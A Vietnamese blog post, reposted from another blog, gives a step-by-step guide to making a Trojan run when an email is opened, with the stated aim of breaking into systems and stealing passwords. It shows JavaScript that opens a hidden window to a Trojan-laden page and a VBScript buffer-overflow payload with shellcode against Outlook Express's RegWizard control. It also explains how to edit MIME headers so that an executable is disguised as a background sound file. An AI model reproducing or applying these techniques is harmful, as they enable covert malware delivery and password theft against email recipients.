Trao đổi với tôi

http://www.buidao.com

7/1/09

[Virus] Cách chạy Trojan khi mở email

Cách chạy Trojan khi mở email

Link gốc: http://my.opera.com/The_Wind1/blog/index.dml/tag/Virut-Trojan

Sau đây tôi sẽ hướng dẫn các bạn 2 cách để chạy Trojan khi mở Email Các Hacker thường dùng Trojan mở cổng để xâm nhập
hệ thống hay lấy Password.
Giới thiệu cách 1 : Thực ra để chạy Trojan khi mở thư là một việc vô cùng đơn giản. Có thể tóm tắt như sau : Ta gắn một con Trojan vào trang Web bằng Godwill ( download here ). Chèn Script vào thư để khi chọn thư sẽ chạy trang Web dính Trojan này.
Giới thiệu cách 2 : Đa số người dùng PC thường sử dụng Outlook Express 5 (OE) để check mail, khi ta đặt cho emai ảnh nền hay nhạc nền (OutlookExpress->New Message->Format->Background-> Picures or Sound) thì temp file sẽ được đặt trong thư mục C:\windows\temp\dat*.tmp. Và đây chính là lổ hổng bảo mật để gửi Trojan.

-------------------

Thực hiện cách thứ 1 :

SCRIPT LANGUAGE="JavaScript">

function trojanday()

{{window.open("trang web dính
trojan","","width=1,height=1,resizable=yes,top=10000,bottom= 10000")}}

</SCRIPT>

Sau đó chèn thêm vào thẻ body


Thực hiện cách thứ 2 :

Bạn tạo một email trong Outlook Express và cho nó một ảnh nền hay nhạc nền ding.wav), khi xem Source của email này ta sẽ thấy id đoạn này có dạng như sau :
<BGSOUND src="cid:002801bf41c9$95325940$0100007f@computername">
computername=là tên PC của bạn

Còn file nhạc nền attach có id :
Content-Type: audio/wav;
name="ding.wav"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>

Bây giờ bạn cho gửi kèm emai đó một file attachment là một con Trojan (w32seepass.exe) sau đó thay đổi file nền bằng chính Trojan đó.

Ở phần Source của email bạn đặt một Script điều khiển để đổi tên temp file (file nhạc nền) thành file exe của Trojan :


<script language="VbScript" >
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "move c:\windows\temp\d*.tmp c:\windows\file.exe"
RegWizObj.InvokeRegWizard(expstr)
</script>

Sau đó save email thành msg.eml, dùng Notepad mở email này ra.

Ở mục file exe kèm theo bạn sẽ thấy :
Content-Disposition: attachment;
filename="file.exe"
Paste đoạn này vào đoạn của file nhạc nền :
Content-Type: audio/wav;
name="Ding.wav"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="file.exe"
Ở mục id của file ding.wav bạn cut content-id :
Content-ID: <002801bf41c9$95325940$0100007f@computername>
Dán nó vào mục attachment của file.exe :
Content-Type: application/x-msdownload;
name="file.exe"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>
Bạn Save lại và chạy file msg.eml bạn sẽ nhìn thấy ở attach là file.exe (nhưng đó chính là file ding.wav), hãy bỏ file này đi. Bây giờ Save lại hoặc bạn có thể gửi đi. Outlook Express sẽ tự đóng lại. Mở thư mục Temp của Windows ra bạn sẽ thấy file.exe được chuyển tới đó, bạn có thể cho file vào mục Start của windows